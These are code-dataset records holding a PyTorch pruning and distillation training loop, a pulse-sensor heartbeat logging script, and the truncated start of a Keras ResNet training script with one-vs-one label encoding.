True) # retain_graph = True\n \n losses_s.update(error_s.item(), inputs.size(0))\n \n writer_train.add_scalar('Performance_loss', error_s.item(), num_iters)\n \n \n ## train mask & surv\n if args.arch == 'vgg':\n \n attention = model_s.att # [batch_size, total_num_channels]\n mask = []\n for name in model_s.features._modules:\n if 'mask' in name:\n alpha = model_s.features._modules[name].alpha \n mask.append(alpha.view(-1))\n mask = torch.cat(mask)\n\n error_sparse = args.sparse_lambda * (torch.norm(mask, 1) / len(mask))\n error_sparse.backward(retain_graph = True)\n\n error_redundant_mimic = args.mask * torch.mean(1 - torch.sum(mask.view([1, -1]) * attention, dim = 1)/ torch.norm(mask, 2)) \n error_redundant_mimic.backward(retain_graph = True)\n \n \n losses_sparse.update(error_sparse.item(), inputs.size(0))\n writer_train.add_scalar('Sparse_loss', error_sparse.item(), num_iters)\n \n losses_redundant.update(error_redundant_mimic.item(), inputs.size(0))\n writer_train.add_scalar('Redundancy_imitation_loss', error_redundant_mimic.item(), num_iters)\n\n if args.t > 0:\n surv = model_s.weibull_fs\n surv = torch.cat(surv)\n \n error_info_cascade = args.sigma * (-1) * torch.mean(torch.log(surv + 1e-5))\n error_info_cascade.backward()\n \n losses_cascade.update(error_info_cascade.item(), inputs.size(0))\n writer_train.add_scalar('Cascades_fit_loss', error_info_cascade.item(), num_iters)\n \n error_kd = args.kd * (-1) * torch.mean(F.softmax(output_t, -1) * torch.log(F.softmax(output_s, -1)))\n error_kd.backward()\n \n losses_kd.update(error_kd.item(), inputs.size(0))\n writer_train.add_scalar('KD_loss', error_kd.item(), num_iters)\n \n ## step forward\n optimizer_s.step()\n \n decay = (epoch % args.lr_decay_step == 0 and i == 1)\n if num_iters % args.mask_step == 0:\n optimizer_m.step(decay)\n \n\n ## evaluate\n prec1, prec5 = utils.accuracy(output_s, targets, topk = (1, 5))\n top1.update(prec1[0], inputs.size(0))\n top5.update(prec5[0], inputs.size(0))\n \n writer_train.add_scalar('Train-top-1', top1.avg, num_iters)\n writer_train.add_scalar('Train-top-5', top5.avg, num_iters)\n \n if i % args.print_freq == 0:\n if args.t > 0:\n print_logger.info(\n 'Epoch[{0}]({1}/{2}): \\n'\n 'Train_loss: {train_loss.val:.4f} ({train_loss.avg:.4f})\\n'\n 'Sparse_loss: {sparse_loss.val:.4f} ({sparse_loss.avg:.4f})\\n'\n 'Redundant_loss: {redundant_loss.val:.4f} ({redundant_loss.avg:.4f})\\n'\n 'Cascade_loss: {cascade_loss.val:.4f} ({cascade_loss.avg:.4f})\\n'\n 'KD_loss: {kd_loss.val:.4f} ({kd_loss.avg:.4f})\\n'\n 'Prec@1 {top1.val:.3f} ({top1.avg:.3f}), '\n 'Prec@5 {top5.val:.3f} ({top5.avg:.3f})\\n'.format(\n epoch, i, num_iterations, \n train_loss = losses_s, \n sparse_loss = losses_sparse,\n redundant_loss = losses_redundant,\n cascade_loss = losses_cascade,\n kd_loss = losses_kd,\n top1 = top1, top5 = top5))\n else:\n print_logger.info(\n 'Epoch[{0}]({1}/{2}): \\n'\n 'Train_loss: {train_loss.val:.4f} ({train_loss.avg:.4f})\\n'\n 'Sparse_loss: {sparse_loss.val:.4f} ({sparse_loss.avg:.4f})\\n'\n 'Redundant_loss: {redundant_loss.val:.4f} ({redundant_loss.avg:.4f})\\n'\n 'KD_loss: {kd_loss.val:.4f} ({kd_loss.avg:.4f})\\n'\n 'Prec@1 {top1.val:.3f} ({top1.avg:.3f}), '\n 'Prec@5 {top5.val:.3f} ({top5.avg:.3f})\\n'.format(\n epoch, i, num_iterations, \n train_loss = losses_s,\n sparse_loss = losses_sparse,\n redundant_loss = losses_redundant,\n kd_loss = losses_kd,\n top1 = top1, top5 = top5))\n \n pruned = torch.sum(mask == 0).detach().cpu()\n num = len(mask)\n \n print_logger.info(\"Pruned {} / {}\\n\".format(pruned, num))\n \n \ndef test(args, loader_test, model_s, epoch):\n losses = utils.AverageMeter()\n top1 = utils.AverageMeter()\n top5 = utils.AverageMeter()\n\n cross_entropy = nn.CrossEntropyLoss()\n\n # switch to eval mode\n model_s.eval()\n \n num_iterations = len(loader_test)\n\n with torch.no_grad():\n for i, (inputs, targets) in enumerate(loader_test, 1):\n num_iters = num_iterations * epoch + i\n \n inputs = inputs.to(device)\n targets = targets.to(device)\n\n logits = model_s(inputs).to(device)\n loss = cross_entropy(logits, targets)\n \n writer_test.add_scalar('Test_loss', loss.item(), num_iters)\n \n prec1, prec5 = utils.accuracy(logits, targets, topk = (1, 5))\n losses.update(loss.item(), inputs.size(0))\n top1.update(prec1[0], inputs.size(0))\n top5.update(prec5[0], inputs.size(0))\n \n writer_test.add_scalar('Test-top-1', top1.avg, num_iters)\n writer_test.add_scalar('Test-top-5', top5.avg, num_iters)\n \n print_logger.info('Prec@1 {top1.avg:.3f} Prec@5 {top5.avg:.3f}\\n'\n '===============================================\\n'\n .format(top1 = top1, top5 = top5))\n\n return top1.avg, top5.avg\n \n\nif __name__ == '__main__':\n main()\n\n", "sub_path": "vgg-svhn/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 13820, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "torch.device", "line_number": 23, "usage_type": "call"}, {"api_name": "utils.options.args.gpus", "line_number": 23, "usage_type": "attribute"}, {"api_name": "utils.options.args", "line_number": 23, "usage_type": "name"}, {"api_name": "utils.common.checkpoint", "line_number": 25, "usage_type": "call"}, {"api_name": "utils.options.args", "line_number": 25, "usage_type": "argument"}, {"api_name": "utils.common", "line_number": 25, "usage_type": "name"}, {"api_name": "utils.common.get_logger", "line_number": 26, "usage_type": "call"}, {"api_name": "utils.common", "line_number": 26, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "utils.options.args.job_dir", "line_number": 26, "usage_type": "attribute"}, {"api_name": "utils.options.args", "line_number": 26, "usage_type": "name"}, {"api_name": "tensorboardX.SummaryWriter", "line_number": 27, "usage_type": "call"}, {"api_name": "utils.options.args.job_dir", "line_number": 27, "usage_type": "attribute"}, {"api_name": "utils.options.args", "line_number": 27, "usage_type": "name"}, {"api_name": "tensorboardX.SummaryWriter", "line_number": 28, "usage_type": "call"}, {"api_name": "utils.options.args.job_dir", "line_number": 28, "usage_type": "attribute"}, {"api_name": "utils.options.args", "line_number": 28, "usage_type": "name"}, {"api_name": "data.svhn.Data", "line_number": 39, "usage_type": "call"}, {"api_name": "utils.options.args", "line_number": 39, "usage_type": "argument"}, {"api_name": "importlib.import_module", "line_number": 44, "usage_type": "call"}, {"api_name": "utils.options.args.arch", "line_number": 44, "usage_type": "attribute"}, {"api_name": "utils.options.args", "line_number": 44, "usage_type": "name"}, {"api_name": "utils.options.args.teacher_model", "line_number": 44, "usage_type": "attribute"}, {"api_name": "importlib.import_module", "line_number": 46, "usage_type": "call"}, {"api_name": "utils.options.args.arch", "line_number": 46, "usage_type": "attribute"}, {"api_name": "utils.options.args", "line_number": 46, "usage_type": "name"}, {"api_name": "utils.options.args.student_model", "line_number": 46, "usage_type": "attribute"}, {"api_name": "utils.options.args.t", "line_number": 46, "usage_type": "attribute"}, {"api_name": "utils.options.args.pretrained", "line_number": 48, "usage_type": "attribute"}, {"api_name": "utils.options.args", "line_number": 48, "usage_type": "name"}, {"api_name": "torch.load", "line_number": 50, "usage_type": "call"}, {"api_name": "utils.options.args.teacher_dir", "line_number": 50, "usage_type": "attribute"}, {"api_name": "utils.options.args", "line_number": 50, "usage_type": "name"}, {"api_name": "utils.options.args.teacher_file", "line_number": 50, "usage_type": "attribute"}, {"api_name": "torch.optim.SGD", "line_number": 66, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 66, "usage_type": "name"}, {"api_name": "utils.options.args.lr", "line_number": 66, "usage_type": "attribute"}, {"api_name": "utils.options.args", "line_number": 66, "usage_type": "name"}, {"api_name": "utils.options.args.momentum", "line_number": 66, "usage_type": "attribute"}, {"api_name": "utils.options.args.weight_decay", "line_number": 66, "usage_type": "attribute"}, {"api_name": "fista.FISTA", "line_number": 67, "usage_type": "call"}, {"api_name": "utils.options.args.lr", "line_number": 67, "usage_type": "attribute"}, {"api_name": "utils.options.args", "line_number": 67, "usage_type": "name"}, {"api_name": "utils.options.args.sparse_lambda", "line_number": 67, "usage_type": "attribute"}, {"api_name": "torch.optim.lr_scheduler.StepLR", "line_number": 69, "usage_type": "call"}, {"api_name": "utils.options.args.lr_decay_step", "line_number": 69, "usage_type": "attribute"}, {"api_name": "utils.options.args", "line_number": 69, "usage_type": "name"}, {"api_name": "torch.optim.lr_scheduler.StepLR", "line_number": 70, "usage_type": "call"}, {"api_name": "utils.options.args.lr_decay_step", "line_number": 70, "usage_type": "attribute"}, {"api_name": "utils.options.args", "line_number": 70, "usage_type": "name"}, {"api_name": "utils.options.args.resume", "line_number": 72, "usage_type": "attribute"}, {"api_name": "utils.options.args", "line_number": 72, "usage_type": "name"}, {"api_name": "torch.load", "line_number": 75, "usage_type": "call"}, {"api_name": "utils.options.args.num_epochs", "line_number": 99, "usage_type": "attribute"}, {"api_name": "utils.options.args", "line_number": 99, "usage_type": "name"}, {"api_name": "utils.options.args", "line_number": 103, "usage_type": "argument"}, {"api_name": "utils.options.args", "line_number": 104, "usage_type": "argument"}, {"api_name": "utils.options.args", "line_number": 128, "usage_type": "argument"}, {"api_name": "importlib.import_module", "line_number": 128, "usage_type": "call"}, {"api_name": "utils.options.args.arch", "line_number": 128, "usage_type": "attribute"}, {"api_name": "utils.options.args.t", "line_number": 128, "usage_type": "attribute"}, {"api_name": "ptflops.get_model_complexity_info", "line_number": 129, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 134, "usage_type": "call"}, {"api_name": "utils.options.args.job_dir", "line_number": 134, "usage_type": "attribute"}, {"api_name": "utils.options.args", "line_number": 134, "usage_type": "name"}, {"api_name": "os.path.isdir", "line_number": 151, "usage_type": "call"}, {"api_name": "os.path", "line_number": 151, "usage_type": "attribute"}, {"api_name": "utils.options.args.job_dir", "line_number": 151, "usage_type": "attribute"}, {"api_name": "utils.options.args", "line_number": 151, "usage_type": "name"}, {"api_name": "os.makedirs", "line_number": 152, "usage_type": "call"}, {"api_name": "utils.options.args.job_dir", "line_number": 152, "usage_type": "attribute"}, {"api_name": "utils.options.args", "line_number": 152, "usage_type": "name"}, {"api_name": "utils.options.args.job_dir", "line_number": 153, "usage_type": "attribute"}, {"api_name": "utils.options.args", "line_number": 153, "usage_type": "name"}, {"api_name": "utils.options.args.job_dir", "line_number": 156, "usage_type": "attribute"}, {"api_name": "utils.options.args", "line_number": 156, "usage_type": "name"}, {"api_name": "utils.options.args.job_dir", "line_number": 159, "usage_type": "attribute"}, {"api_name": "utils.options.args", "line_number": 159, "usage_type": "name"}, {"api_name": "utils.common.AverageMeter", "line_number": 169, "usage_type": "call"}, {"api_name": "utils.common", "line_number": 169, "usage_type": "name"}, {"api_name": "utils.common.AverageMeter", "line_number": 170, "usage_type": "call"}, {"api_name": "utils.common", "line_number": 170, "usage_type": "name"}, {"api_name": "utils.common.AverageMeter", "line_number": 171, "usage_type": "call"}, {"api_name": "utils.common", "line_number": 171, "usage_type": "name"}, {"api_name": "utils.common.AverageMeter", "line_number": 172, "usage_type": "call"}, {"api_name": "utils.common", "line_number": 172, "usage_type": "name"}, {"api_name": "utils.common.AverageMeter", "line_number": 173, "usage_type": "call"}, {"api_name": "utils.common", "line_number": 173, "usage_type": "name"}, {"api_name": "utils.common.AverageMeter", "line_number": 175, "usage_type": "call"}, {"api_name": "utils.common", "line_number": 175, "usage_type": "name"}, {"api_name": "utils.common.AverageMeter", "line_number": 176, "usage_type": "call"}, {"api_name": "utils.common", "line_number": 176, "usage_type": "name"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 187, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 187, "usage_type": "name"}, {"api_name": "utils.options.args.arch", "line_number": 222, "usage_type": "attribute"}, {"api_name": "utils.options.args", "line_number": 222, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 230, "usage_type": "call"}, {"api_name": "utils.options.args.sparse_lambda", "line_number": 232, "usage_type": "attribute"}, {"api_name": "utils.options.args", "line_number": 232, "usage_type": "name"}, {"api_name": "torch.norm", "line_number": 232, "usage_type": "call"}, {"api_name": "utils.options.args.mask", "line_number": 235, "usage_type": "attribute"}, {"api_name": "utils.options.args", "line_number": 235, "usage_type": "name"}, {"api_name": "torch.mean", "line_number": 235, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 235, "usage_type": "call"}, {"api_name": "torch.norm", "line_number": 235, "usage_type": "call"}, {"api_name": "utils.options.args.t", "line_number": 245, "usage_type": "attribute"}, {"api_name": "utils.options.args", "line_number": 245, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 247, "usage_type": "call"}, {"api_name": "utils.options.args.sigma", "line_number": 249, "usage_type": "attribute"}, {"api_name": "utils.options.args", "line_number": 249, "usage_type": "name"}, {"api_name": "torch.mean", "line_number": 249, "usage_type": "call"}, {"api_name": "torch.log", "line_number": 249, "usage_type": "call"}, {"api_name": "utils.options.args.kd", "line_number": 255, "usage_type": "attribute"}, {"api_name": "utils.options.args", "line_number": 255, "usage_type": "name"}, {"api_name": "torch.mean", "line_number": 255, "usage_type": "call"}, {"api_name": "torch.nn.functional.softmax", "line_number": 255, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 255, "usage_type": "name"}, {"api_name": "torch.log", "line_number": 255, "usage_type": "call"}, {"api_name": "utils.options.args.lr_decay_step", "line_number": 264, "usage_type": "attribute"}, {"api_name": "utils.options.args", "line_number": 264, "usage_type": "name"}, {"api_name": "utils.options.args.mask_step", "line_number": 265, "usage_type": "attribute"}, {"api_name": "utils.options.args", "line_number": 265, "usage_type": "name"}, {"api_name": "utils.common.accuracy", "line_number": 270, "usage_type": "call"}, {"api_name": "utils.common", "line_number": 270, "usage_type": "name"}, {"api_name": "utils.options.args.print_freq", "line_number": 277, "usage_type": "attribute"}, {"api_name": "utils.options.args", "line_number": 277, "usage_type": "name"}, {"api_name": "utils.options.args.t", "line_number": 278, "usage_type": "attribute"}, {"api_name": "utils.options.args", "line_number": 278, "usage_type": "name"}, {"api_name": "torch.sum", "line_number": 311, "usage_type": "call"}, {"api_name": "utils.common.AverageMeter", "line_number": 318, "usage_type": "call"}, {"api_name": "utils.common", "line_number": 318, "usage_type": "name"}, {"api_name": "utils.common.AverageMeter", "line_number": 319, "usage_type": "call"}, {"api_name": "utils.common", "line_number": 319, "usage_type": "name"}, {"api_name": "utils.common.AverageMeter", "line_number": 320, "usage_type": "call"}, {"api_name": "utils.common", "line_number": 320, "usage_type": "name"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 322, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 322, "usage_type": "name"}, {"api_name": "torch.no_grad", "line_number": 329, "usage_type": "call"}, {"api_name": "utils.common.accuracy", "line_number": 341, "usage_type": "call"}, {"api_name": "utils.common", "line_number": 341, "usage_type": "name"}]} +{"seq_id": "486869629", "text": "from pulsesensor import Pulsesensor\nimport time\nimport datetime\n\n# Init sensor\np = Pulsesensor()\n# Start measuring Heartbeat\np.startAsyncBPM()\n\n# Try to run code\ntry:\n # Run forever\n while True:\n # Prompt user for input and store key pressed\n input = 'y' #input(\"\\n\\nReady to measure Heartbeat (y/n)?\")\n # If user pressed 'y'\n if input == 'y':\n # Get current date & time\n now = datetime.datetime.now()\n filename = now.strftime(\"%b-%d-%Y-%H-%M-%S.txt\")\n print(\"Saving to file name %s\" % filename)\n # Open a file to append lines\n with open(filename, 'a') as file:\n # Run forever\n while True:\n # Get BPM\n bpm = p.BPM\n # Init line variable\n line = \"\"\n # If bpm found\n if bpm > 0:\n # Format BPM save in line variable\n line = \"BPM: %d\\n\" % bpm\n else:\n # Not found message\n line = \"No Heartbeat found\\n\"\n # Print line to console\n print(line)\n # Append line to file\n file.write(line)\n # Wait a second\n time.sleep(1)\n else:\n print(\"Not ready\")\n\n# If error\nexcept:\n # Stop measuring Heartbeat\n p.stopAsyncBPM()\n", "sub_path": "heartbeat.py", "file_name": "heartbeat.py", "file_ext": "py", "file_size_in_byte": 1494, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "pulsesensor.Pulsesensor", "line_number": 6, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 19, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 19, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 42, "usage_type": "call"}]} +{"seq_id": "123842763", "text": "# Basierend auf der Implementierung von Pornntiwa Pawara (https://www.ai.rug.nl/~p.pawara/dataset.php -> Tropic Dataset -> source code -> main.py)\nimport argparse\nfrom datetime import datetime\nimport pickle\nimport sys\nfrom pathlib import Path\n\nimport tensorflow as tf\nimport keras\nimport numpy as np\nimport tflearn.data_utils\n# Workaround für Modulfehler: tensorflow.python kann später aus irgendwelchen Gründen nicht mehr\n# direkt unter diesem Namen aufgerufen werden\n# Daher from ... import ... as tfclient um tensorflow.python.client später (als tfclient) noch verwenden zu können\nfrom tensorflow.python import client as tfclient # Nur wichtig um GPU-Name zu ermitteln\n\n# _WORK_DIR = Path(\"G://Bachelorarbeit\")\n_WORK_DIR = Path(\"/scratch/tmp/m_wolf37/Bachelorarbeit/\")\n_DATASET_DIR = Path(\"/scratch/tmp/m_wolf37/Bachelorarbeit/datasets_exps\")\n\ninit_learning_rate = 0.001\n_BATCH_SIZE = 16\n_OVO_MATRIX_TRANSPOSED = None\n_VERBOSE = True\n_DATA_AUGMENTATION = True\n\n\ndef get_learning_rate(epoch):\n \"\"\"Gibt Learning-Rate abhängig von aktueller Epoche zurück (alle 50 Epochen um 0.1 verringern)\"\"\"\n lr = init_learning_rate\n\n if epoch > 150:\n lr = 0.001 * init_learning_rate\n elif epoch > 100:\n lr = 0.01 * init_learning_rate\n elif epoch > 50:\n lr = 0.1 * init_learning_rate\n print(\"Epoche %s -> Learning-Rate: %s\" % (epoch, lr))\n return lr\n\n\ndef ovo_crossentropy_loss(y_true, y_pred):\n \"\"\"Berechnet die OvO Crossentropy nach der Formel aus dem Paper von Pawara et al.\"\"\"\n # Bei OvO wird als Aktivierungsfunktion 'tanh' verwendet. Diese produziert Werte aus (-1, 1)\n # Auf Wertebereich [0,1] hochskalieren (eigentlich möchte man (0,1) erreichen um später im Logarithmus\n # keine undefinierten Werte zu erhalten, aber wegen numerischen Problemen sind auch 0 und 1 denkbare Werte)\n y_true_scaled = (y_true + 1.0) / 2.0\n y_pred_scaled = (y_pred + 1.0) / 2.0\n\n # Wertebereich von y_pred_scaled von [0,1] auf [0.00001, 0.99999] einschränken wegen Logarithmen. Näherung an (0,1)\n\n zeroes = tf.zeros_like(y_pred_scaled) # Tensor mit gleicher Dimension wie 'y_pred_scaled' bestehend aus nur 0en\n # Alle kleineren Werte als 0.00001 in 'y_pred_scaled' auf 0.00001 setzen (untere Schranke für Wertebereich)\n y_pred_scaled = tf.where(y_pred_scaled < 0.00001, zeroes + 0.00001, y_pred_scaled)\n # Alle größeren Werte als 0.99999 in 'y_pred_scaled' auf 0.99999 setzen (obere Schranke für Wertebereich)\n y_pred_scaled = tf.where(y_pred_scaled > 0.99999, zeroes + 0.99999, y_pred_scaled)\n\n # J_{OvO} aus Pawara et al. anwenden\n log_function = tf.log if tf.__version__ == \"1.13.1\" else tf.math.log # flexibel für neue / alte Version\n loss = - tf.reduce_mean(\n y_true_scaled * log_function(y_pred_scaled) + (1 - y_true_scaled) * log_function(1 - y_pred_scaled))\n return loss\n\n\ndef ovo_accuracy_metric(y_true, y_pred):\n \"\"\"Errechnet die vorhergesagte Klasse aus der OvO-kodierten Netzausgabe (y_pred) und berechnet mit Hilfe der\n erwarteten Klasse (y_true, ebenfalls OvO-kodiert) die Accuracy\"\"\"\n # OvO Matrix als Single-Precision float\n single_prec_matrix = _OVO_MATRIX_TRANSPOSED.astype(np.single)\n # One-Hot kodierten Wahrscheinlichkeitsvektor aus OvO-Kodierung berechnen\n y_true_one_hot = tf.tensordot(y_true, single_prec_matrix, axes=1)\n y_pred_one_hot = tf.tensordot(y_pred, single_prec_matrix, axes=1)\n # Klassennummern berechnen (argmax des One-Hot kodierten Wahrscheinlichkeitsvektors)\n true_class = keras.backend.argmax(y_true_one_hot, axis=-1)\n pred_class = keras.backend.argmax(y_pred_one_hot, axis=-1)\n # Zählen, wie oft erwartete und vorhergesagte Klasse übereinstimmen\n correct_pred = keras.backend.equal(true_class, pred_class)\n return keras.backend.mean(correct_pred)\n\n\ndef load_dataset(dataset_name: str, fold_name: str, train_percent: int, is_ovo: bool, img_size: int):\n \"\"\"Lädt einen Datensatz entsprechend der übergebenen Parameter\"\"\"\n # Zu ladendes Verzeichnis\n dir_to_load = _DATASET_DIR / dataset_name / \"exps\" / fold_name\n # train und test Unterordner\n train_dir = dir_to_load / (\"train_\" + str(train_percent))\n test_dir = dir_to_load / \"test\"\n\n print(\"Lade Datensatz aus %s\" % str(dir_to_load))\n print(\"Train-Bilder aus %s\" % str(train_dir))\n print(\"Test-Bilder aus %s\" % str(test_dir))\n # categorical_labels=True sorgt dafür, dass die Label als One-Hot (bzw. als Zielvektor) kodiert geladen werden\n # =False lädt einfach nur die Klassennummer\n x_train, y_train = tflearn.data_utils.image_preloader(train_dir, image_shape=(img_size, img_size), grayscale=False,\n mode=\"folder\", categorical_labels=not is_ovo, normalize=True)\n x_test, y_test = tflearn.data_utils.image_preloader(test_dir, image_shape=(img_size, img_size), grayscale=False,\n mode=\"folder\", categorical_labels=not is_ovo, normalize=True)\n\n print(\"Lade Train-Bilder...\")\n x_train = np.asarray(x_train)\n print(\"Lade Test-Bilder...\")\n x_test = np.asarray(x_test)\n print(\"Lade Train-Label...\")\n y_train = np.asarray(y_train)\n print(\"Lade Test-Label...\")\n y_test = np.asarray(y_test)\n\n assert x_train.__len__() == y_train.__len__()\n assert x_test.__len__() == y_test.__len__()\n\n print(\"Bilder im Train-Split %s\" % x_train.__len__())\n print(\"Bilder im Test-Split %s\" % x_test.__len__())\n\n # Im kompletten Train-Split (ohne train_size Prozent auszuwählen) liegen eigentlich so viele Dateien:\n complete_train_split_path = train_dir.parent / \"train_100\" # voller Trainsplit liegt im train_100 Ordner (100%)\n # Zähle, wie groß der komplette Trainsplit (100%) ist\n orig_number_train = 0\n for klasse in complete_train_split_path.iterdir():\n orig_number_train += [f for f in klasse.iterdir()].__len__()\n\n print(\"Trainiere auf %s Prozent des Train-Splits. %s / %s Bildern im Train-Split\" % (\n train_percent, x_train.__len__(), orig_number_train))\n print(\"Testsplit enthält %s Bilder\" % x_test.__len__())\n\n # wie bei Pawara et al. wird der Mittelwert der Pixel im Trainsplit vom Train- und Testsplit abgezogen\n x_train_mean = np.mean(x_train, axis=0)\n x_train -= x_train_mean\n x_test -= x_train_mean\n\n return x_train, y_train, x_test, y_test\n\n\ndef get_ovo_matrix(num_classes: int):\n \"\"\"Berechnet die OvO-Kodierungsmatrix passend zu num_classes\"\"\"\n global _OVO_MATRIX_TRANSPOSED\n np.set_printoptions(threshold=sys.maxsize)\n # Liste mit allen Klassifikatoren, gespeichert als Tupel (a,b) -> Dieser Klassifikator unterscheidet\n # Klasse a vs Klasse b\n classifier_pair = []\n # Baue Liste mit Klassifikatoren\n for lower_limit in range(2, num_classes + 1):\n for i in range(0, num_classes - lower_limit + 1):\n classifier_pair.append((lower_limit - 1, lower_limit + i))\n print(\"Paare von Klassifikatoren für die Kodierungs-Matrix:\")\n print(classifier_pair)\n # Anzahl an Klassifikatoren sollte mit dem Ergebnis der Formel aus Pawara et al. übereinstimmen\n assert classifier_pair.__len__() == num_classes * (num_classes - 1) // 2\n\n # Erstelle leere Matrix [_num_classes X Anzahl Klassifikatoren]\n matrix = np.zeros((num_classes, num_classes * (num_classes - 1) // 2), dtype=float)\n # Fülle Matrix abhängig von aktueller Zeilennummer (True Class)\n for row in range(matrix.__len__()):\n for col in range(matrix[row].__len__()):\n # Hole Klassifikator (Paar von zu trennenden Klassen) aus Klassifikator Liste\n classifier_one, classifier_two = classifier_pair[col]\n # (Paare von zu trennenden Klassen fangen bei 1 an, row und col bei 0)\n # Wenn True-Class nicht vom aktuellen Klassifikator (Spalte) getrennt wird, lasse 0 stehen\n if classifier_one != row + 1 and classifier_two != row + 1:\n continue\n # Wenn 1. Klasse von aktuellem Klassifikator der True-Class entspricht, fülle Zelle mit 1\n elif classifier_one == row + 1 and classifier_two != row + 1:\n matrix[row][col] = 1\n # Wenn 2. Klasse von aktuellem Klassifikator der True-Class entspricht, fülle Zelle mit -1\n elif classifier_one != row + 1 and classifier_two == row + 1:\n matrix[row][col] = -1\n else:\n # Sollte nie passieren\n print(\"Fehler! Kodierungs-Matrix falsch berechnet\")\n exit(12)\n # Transponiere die Matrix (macht später die Berechnungen einfacher)\n _OVO_MATRIX_TRANSPOSED = matrix.transpose()\n print(\"Kodierungs-Matrix für OvO:\")\n print(_OVO_MATRIX_TRANSPOSED)\n print(20 * \"-\")\n return _OVO_MATRIX_TRANSPOSED\n\n\ndef convert_labels_to_ovo(labels: np.array, num_classes: int):\n \"\"\"Label zu OvO-Kodierung konvertieren\"\"\"\n print(\"Mappe Klassennummer zu OvO-Vektor...\")\n ovo_encoded_labels = np.zeros((labels.__len__(), num_classes * (num_classes - 1) // 2))\n for label_index in range(0, labels.__len__()):\n # OvO-Matrix ist transposed. Spalten und Zeilen vertauscht, hole komplette Spalte zu Klassennummer\n ovo_encoded_labels[label_index] = _OVO_MATRIX_TRANSPOSED[:, labels[label_index]]\n if _VERBOSE:\n print(\"%s gemappt zu \" % (labels[label_index] + 1))\n print(ovo_encoded_labels[label_index])\n print(20 * \"-\")\n return ovo_encoded_labels\n\n\ndef evaluate_model(model, x, y_true, is_ovo, save_dir: Path, train_test: str):\n \"\"\"Wertet ein übergebenes Modell auf übergebenen Daten aus und gibt Metriken dazu zurück.\n 'save_dir' gibt an, wo die Netzausgabe, die erwartete und vorhergesagte Klassennummer als Numpy-Array abgespeichert werden soll\n 'train_test' ist lediglich ein String, um abgespeicherte Numpy-Arrays für Train und Test (im gleichen Ordner)\n voneinander zu unterscheiden\"\"\"\n np.set_printoptions(threshold=sys.maxsize)\n if is_ovo: # OvO\n # vorhergesagte Klassennummer zu den Eingabedaten bestimmen\n output_prediction = model.predict(x)\n one_hot_pred = np.matmul(output_prediction, _OVO_MATRIX_TRANSPOSED)\n predicted_classes = np.argmax(one_hot_pred, axis=1)\n\n # erwartete Klassennummer aus OvO-Kodierung bestimmen\n y_true_one_hot = np.matmul(y_true, _OVO_MATRIX_TRANSPOSED)\n y_true_classes = np.argmax(y_true_one_hot, axis=1)\n # Accuracy berechnen\n correct_predictions = np.equal(predicted_classes, y_true_classes)\n acc = correct_predictions.mean() * 100\n # Loss berechnen (mit OvO-kodierten y_true und y_pred)\n loss = ovo_crossentropy_loss(y_true=y_true, y_pred=output_prediction).eval(session=tf.compat.v1.Session())\n else: # OvA\n # Loss und Accuracy bestimmen\n loss_acc = model.evaluate(x, y_true)\n acc = loss_acc[1] * 100 # Accuracy an Stelle 1\n loss = loss_acc[0]\n # Zum Abspeichern Netzausgabe, vorhergesagte und erwartete Klassennummer berechnen\n output_prediction = model.predict(x)\n predicted_classes = np.argmax(output_prediction, axis=1)\n y_test_classes = np.argmax(y_true, axis=1)\n\n # Speichere 'output_prediction', 'predicted_classes' und 'y_test_classes' in 'save_dir' einzeln als Datei ab\n np.save(save_dir / (\"raw_net_output_\" + train_test + \".npy\"), output_prediction)\n np.save(save_dir / (\"predicted_classes_\" + train_test + \".npy\"), predicted_classes)\n np.save(save_dir / (\"true_classes_\" + train_test + \".npy\"), y_test_classes)\n return acc, loss\n\n\ndef train(dataset: str, fold: str, img_size: int, is_ovo: bool, net_type: str, epochs: int, is_finetune: bool,\n train_percent: int, learning_rate: int, extra_info=\"\"):\n \"\"\"Trainiert ein Netz mit den angegebenen Parametern, wertet es aus und schreibt die Ergebnisse als Numpy-Array\n in einen Ordner bzw. in die Logdatei\"\"\"\n global init_learning_rate, _OVO_MATRIX_TRANSPOSED\n start = datetime.now()\n # übergebene Parameter auflisten\n print(20 * \"-\" + \"Parameter für das Training\" + 20 * \"-\")\n print(\"Datensatz: %s\" % dataset)\n print(\"Fold: %s\" % fold)\n print(\"Bildgröße: %s\" % img_size)\n print(\"Kodierung: %s\" % (\"OvO\" if is_ovo else \"OvA\"))\n print(\"Netz: %s\" % net_type)\n print(\"Epochen: %s\" % epochs)\n print(\"Gewichte: %s\" % (\"Finetune\" if is_finetune else \"Scratch\"))\n print(\"Prozentsatz des Trainingssplits: %s\" % train_percent)\n print(\"Initiale Learning-Rate: %f\" % learning_rate)\n print(66 * \"-\")\n\n # Learning-Rate setzen\n init_learning_rate = learning_rate\n\n # weights setzen (Scratch oder Pretrained mit Imagenet)\n weights = None\n if is_finetune:\n weights = \"imagenet\"\n # Klassenanzahl aus Datensatz-Name ableiten (Zahl am Ende des Datensatz-Namens ist Klassenanzahl)\n last_digits = 0\n for c in dataset[::-1]:\n if c.isdigit():\n last_digits += 1\n else:\n break\n\n num_classes = int(dataset[dataset.__len__() - last_digits:])\n print(\"Anzahl an Klassen: %s\" % num_classes)\n\n # Verschiedene Netz-Varianten\n\n if net_type.lower() in [\"resnet\", \"resnet50\", \"r\"]:\n net_type = \"R\"\n # Erste und letzte Schicht weglassen (include_top=False) und eigene Input-Shape\n model = keras.applications.resnet50.ResNet50(weights=weights, include_top=False,\n input_shape=(img_size, img_size, 3))\n out = model.output\n # vorletzte 